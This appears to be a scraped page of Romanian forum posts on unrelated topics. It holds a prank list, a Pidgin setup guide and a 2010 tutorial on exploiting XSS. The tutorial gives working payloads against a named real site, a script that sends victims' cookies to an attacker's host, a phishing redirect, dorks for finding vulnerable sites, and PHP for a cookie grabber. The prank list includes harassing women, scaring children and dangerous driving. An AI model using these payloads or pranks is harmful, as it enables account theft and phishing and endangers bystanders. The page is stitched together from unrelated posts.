Leaderboard

Nu se omoara intre ei aiurea doar ca poti fi foarte usor arestat pe motive de tradare a patriei,drepturile omului fiind mereu incalcate.. sunt in total 14 ziare, doua radiouri si patru televiziuni.(nu toate ziarele le gasesti la tarabe).

o sa ajung la 4! - 7 ... imi extind si eu array-ul cu un byte in aprilie

La scoala: -sa faci concurs de zgomote ciudate in ora -sa faci concurs de mancat ardei iuti -sa faci concurs de baut lapte fara sa vomiti -sa faci concurs de baut lapte pana vomiti -sa mesteci guma cu gura deschisa -sa faci zgomote cu un pix -sa bati campii cu profesorii ca sa treaca cat mai repede ora -sa enervezi gardianul -sa furi matura femeii de serviciu si sa fugi cu ea prin toata scoala -sa furi o caldare si s-o folosesti sa uzi pe oricine iti iese in cale -sa blochezi intrarea in scoala prin orice mijloc -sa faci concurs de baut apa si sa nu te duci la baie toata ora -sa bei suc cu 6 lingurite de zahar si orice altceva ce te va face sa fii hiperactiv -sa te prefaci ca dormi -chiar sa dormi -bataie cu creta -bataie cu covrigi sau alta mancare -sa imbraci un scaun in haine -sa stergi tabla cu suc (cu cat mai mult zahar cu atat mai bine) -sa (te prefaci ca) sughiti -sa te descalti (dupa sport) -sa ceri voie la baie din 5 in 5 minute pana iti da voie si repeti dupa ce te intorci -sa te plimbi prin clasa si apoi sa te asezi la loc fara sa zici nimic -sa spui la toata lumea ca dati lucrare ca sa nu chiulesti singur -sa pui o poza cu becalii in locul lui eminescu si sa vezi cine observa -sa mananci cat mai mult in ora dinaintea pauzei mari -sa te duci la alimentara sa cumperi ce gasesti mai ieftin si sa mananci in ora (preferabil ca la (26) ) -fa glume “de santier” colegului de banca: piedici, trage scaunul de subt el, furai pixurile… etc. -lipeste stickere pe spatele oricui cu un mesaj cat mai amuzant In masina: -sa cauti caini care alearga dupa masini si sa deschizi brusc portiera -sa mergi cu stergatoarele pornite in orice conditii de vreme -sa te dai jos din masina la semafor rosu, s-o inchizi si sa pleci -sa franezi cat mai tarziu -sa dai din cap in timp ce asculti stirile la radio -sa-ti cumperi si sa-ti pui cat mai multe chestii odorizante prin masina -sa-ti lipesti un sticker pe bara din spate -sa opresti la semafor la verde -sa pornesti cand se face rosu -sa nu ocolesti nici o groapa pe motiv ca nu le vezi -sa mergi cu 5 km/h pana se face coada de masini sau se da cineva jos sa te bata -sa legi un prieten, sa-l pui pe bancheta din spate si sa te plimbi prin orash pana te opreste politia -sa-ti pui o portvoce ca a politiei pe masina …. …. …. -sa faci orice ca sa-i enervezi pe restul -opreste masina, pune pe toata lumea sa fumeze pana nu mai vezi nimic, apoi deschide usile -arunca orice pe geam -arunca cu monede in aia care merg cu faza lunga -sa mergi cu faza lunga tot timpul -lipeste-ti cat mai multe semne de incepator pe masina -daca poti, mergi prin namol pana iti murdaresti toata masina Pe strada: -sa mananci iaurt cu paine in statia de autobuz -sa arunci cu iaurt in masini dupa ce te-ai saturat -sa intrebi lumea pe strada daca vor sa faca sex -sa mergi pe strada si sa ridici fustele fetelor -….si sa fugi… -sa te prefaci ca faci un sondaj de opinie si sa intrebi lumea chestii intime -sa fugi cand vezi politia -sa fugi in curul gol -sa te stambi la oameni pe strada -sa te plimbi cu o pancarda cu free hugs -sa faci poze la oamanii imbracati ciudat -sa umblii imbracat in Mos Craciun in timpul verii -sa flirtezi cu batranei -sa canti la chitara pe strada cu o cutie in fatza (chiar daca nu stii sa canti) -sa mergi pe strada cu o pancarda agatzata de gat cu diverse mesaje si sa studiezi reactiile -sa opresti oamenii p strada, sa le zici ca te-ai certat cu prietena si sa le ceri sfaturi -sa te arunci in tomberoane -iesi iarna p strada in pantaloni scurti si tricou si cerseste haine ( fa si mofturi daca nu iti place) -sa-ti plimbi cainele imaginar -imagineaza-ti cum ar arata toata lume de pe strada goala -sa te imbraci in roz si sa vinzi curve imaginare -sa latri (si sa alergi) dupa masini -sa faci pe mortul -holbeaza-te in ceafa cuiva pana se intoarce -fluiera/canta ceva enervant -saluta pe toata lumea -intreaba cat este ceasul -traverseaza cat mai incet strada -mergi sarind -mergi in patru labe -sa tragi cu inca un prieten de o sfoara imaginara de pe un trotuar pe celalalt sa vezi ce se intampla In autobuz: -sa stai pe doua locuri -canta ( chiar daca n-ai voce) colinde -sa te imbraci cat mai ciudat -sa vorbesti cu prietenul imaginar de langa tine -in fiecare statie sa te lovesti cu capul de geam -holbeaza-te la cineva in varsta -sperie un copil -verifica daca lumea are bilete -coboara si urca din autobuz in fiecare statie Cu prietenii: -sa mergeti intr-un local si sa vedeti cat puteti sa stati fara sa comandati nimic -sa alergati pe strada cu masti si sa vedeti cat dureaza pana va ia politia la intrebari -sa cauti sa mananci chestii pe care in mod normal nu le-ai manca -alege un prieten si organizati o bataie cu oua -organizati un concurs de dat palme -sunati la un numar oarecare si incepeti sa conversati -jucati ceva cu bautura -sa va prefaceti ca sunteti beti toti -gasiti un prieten de sex opus si simulati o despartire (cat mai urat) pe strada… -sa iesi in spatele blocului la o tigara (daca nu fumezi, apuca-te) si sa te ascunzi de vecini -fumati tot ce prindeti -sa faci o lista cu 100 de lucruri care le-ai face cand te plictisesti si apoi chiar sa faci unele dintre ele Daca iti mai vin si alte idei, nu va fie frica, impartasiti-le si la altii…

Despre XSS Autor: Synthesis Data: 19 mai 2010 Acest articol este munca a doua ore si un bax de Becks. Cuprins: [1] Ce este XSS? [2] Tipuri de XSS [2.1] XSS nepersistent [2.2] XSS persistent [3] Cum se exploateaza un XSS? [3.1] Furtul de prajiturele [3.2] Redirectionarea catre alta pagina [3.3] Trecerea de filtrele de securitate [4] Cum se creeaza un cookie grabber? Cerinte: Cunostinte HTML Cunostinte JavaScript Cunostinte PHP 1. Ce este XSS? XSS (Cross Site Scripting) este o vulnerabilitate foarte intalnita in aplicatiile web ce permite utilizatorilor sa injecteze cod javascript in pagini web ce pot fi vizualizate de ceilalti. Cu ajutorul acestor coduri javascript se pot fura cookie-uri, se pot trece de filtrele de securitate, se pot face redirectionari catre alte pagini web pentru phishing. Vom vorbi despre toate acestea pe parcursul articolului. Vulnerabilitatile de tip XSS sunt exploatate inca din anii '90. Timp de 20 de ani, acest atac a afectat multe site-uri mari precum Google, Yahoo!, hi5, Facebook, MySpace, Tagged s.a. 2. Tipuri de XSS Exista doua tipuri de Cross Site Scripting. [2.1] XSS nepersistent In primul rand este XSS-ul nepersistent (sau reflectat), ce se foloseste in formularele de tip HTML (HTML forms). Spre exemplu, luam site-ul First Bike. Vom observa in partea dreapta sus o casuta de cautare. Sa scriem spre exemplu cuvantul test. URL-ul va fi de genul urmator : http://firstbike.ro/cauta.php?src=test Bun, deci cautarea se face prin GET. In loc de test vom adauga un cod javascript simplu, si anume alert. http://firstbike.ro/cauta.php?src=<script>alert('xss')</script> Browserul va arata o casuta in care scrie xss. Acum, in loc de 'xss' vom pune document.cookie. Acesta este defapt cookie-ul tau de pe site. http://firstbike.ro/cauta.php?src=<script>alert(document.cookie)</script> De aici, se poate crea un cookie grabber pentru a fura cookie-urile utilizatorilor. Vom vorbi despre asta putin mai tarziu in articol. [2.2] XSS persistent In al doilea rand este XSS-ul persistent (sau retinut), ce este mult mai rau decat XSS-ul reflectat. Acest tip de XSS este memorat in site si este accesibil oricarui utilizator. Cel mai frecvent am observat ca acest tip de XSS se regaseste in site-urile ce memoreaza ultimele cautari alte utilizatorilor. Puteti vedea aici un exemplu de XSS persistent. Pentru mai multe XSS-uri persistente cautati pe Google cu Google dorks: intext: cautari similare intext: cautari recente intext: ulitmele cautari intext: cautari referate intext: cautari muzica etc. 3. Cum se exploateaza un XSS? Cum apare un XSS? Un XSS apare din cauza nefiltrarii (sau filtrarii proaste) a codului. Aveti mai jos un exemplu de nefiltrare al XSS-ului <html> <head> <title>Vulnerabilitate XSS</title> </head> <body> <form action="index.php" method="get"> <input type="text" value="codul tau aici" name="cauta"> <input type="submit" value="cauta"> </form> <?php $get = $_GET['cauta']; echo $get; ?> Pentru a exploata un XSS, trebuie in primul rand sa ai notiunile de baza despre JavaScript. [3.1] Furtul de prajiturele XSS-ul este folosit in principal pentru a fura prajiturele (cookies). Pentru asta, se foloseste document.location sau window.location pentru a redirectiona victima catre un cookie grabber (despre care discutam imediat in articol). Codul este urmatorul: <script>document.location="http://www.siteultau.ro/grabber/index.php?cookie="+document.cookie;</script> [3.2] Redirectionarea catre alta pagina Codul este aproximativ la fel, doar ca nu mai folosim document.cookie. Acest cod este folosit deseori pentru furtul de date. <script>document.location="http://www.siteultau.ro/paginafalsa/index.php";</script> [3.3] Trecerea de filtrele de securitate Acest tip de XSS este scris de obicei in bara de adresa. Spre exemplu, daca avem un INPUT care are valoarea maxima de X caractere, putem folosi comanda urmatoare pentru a scrie cate caractere vrem: javascript:document.getElementsByTagName('form')[0].NAME.value = "textul tau aici"; void(0); [0] = index-ul NAME = NAME-ul input-ului (ex: <input type="text" name="rstcenter">) Prin acest JavaScript am dat de cateva XSS permanente in site-uri mari precum Yahoo! si hi5. 4. Cum se creeaza un cookie grabber? Am discutat anterior despre furtul cookie-urilor. Acum voi explica cum se face un simplu cookie grabber. In primul rand vom folosi functia $_GET pentru a prelua cookie-ul. <?php $c = $_GET['cookie']; ?> Aceasta functie va prelua orice text ce vine dupa cookie=. Spre exemplu, daca avem index.php?cookie=2dccd1ab3e03990aea77359831c85ca2, codul 2dccd1ab3e03990aea77359831c85ca2 va fi preluat in variabila $c. Il vom memora intr-un fisier .txt. <?php $c= $_GET['cookie'] . "\n"; $fisier = "prajiturele.txt"; $deschis = fopen($fisier, 'a'); fwrite($deschis, $c); fclose($deschis); ?> Pentru incepatori: 1. Fisierul prajiturele.txt se pune in acelasi director cu cookie grabber-ul. 2. Fisierul prajiturele.txt primeste CHMOD 777. Sper ca v-a ajutat acest mic tutorial!

Probabil dupa ce ati instalat backtack 4 final ati vazut ca nu puteti intra pe Yahoo messenger cu Kopete , clientul predefinit , din cate am inteles are un bug care nu-i permite sa se conecteze la serverul de messenger pt Yahoo .Chiar daca veti descarca orice alt clent nu va functiona cu yahoo ,va trebui sa modificati cateva lucruri.Aici voi descrie cum sa descarcati si sa configurati clientul Pidgin pt a putea folosi yahoo messenger deoarece nu va merge de default (pt celelalte tipuri de messenger functioneaza). Primul lucru care trebuie sa il faceti e sa intrati in System > Software Sources , mergeti la rubrica Third-Party Software unde dati +Add si adaugati : deb http://ppa.launchpad.net/pidgin-developers/ppa/ubuntu intrepid main Dupa care descarcati de aici http://news.softpedia.com/images/extra/LINUX/small/pidgin_key un key file pgp public si il salvati in pc . Mergeti in System > Software Sources la sectiunea Authentication si dati +Import Key File ,aici va trebui sa puneti file pgp pe care lati descarcat in computer . Dupa care dati un simplu apt-get update in cazul in care sunteti root sau sudo apt-get update daca sunteti user normal . Acum puteti sa instalati pidgin .Mergeti in System > Synaptic Package Manager iar in sectiunea Quick Search scrieti Pidgin si punetti x in casuta corespunzatoare a pachetului dupa care dati Aplly. Se va instala clientul Pidgin ,dupa care dati apt-get update in terminal .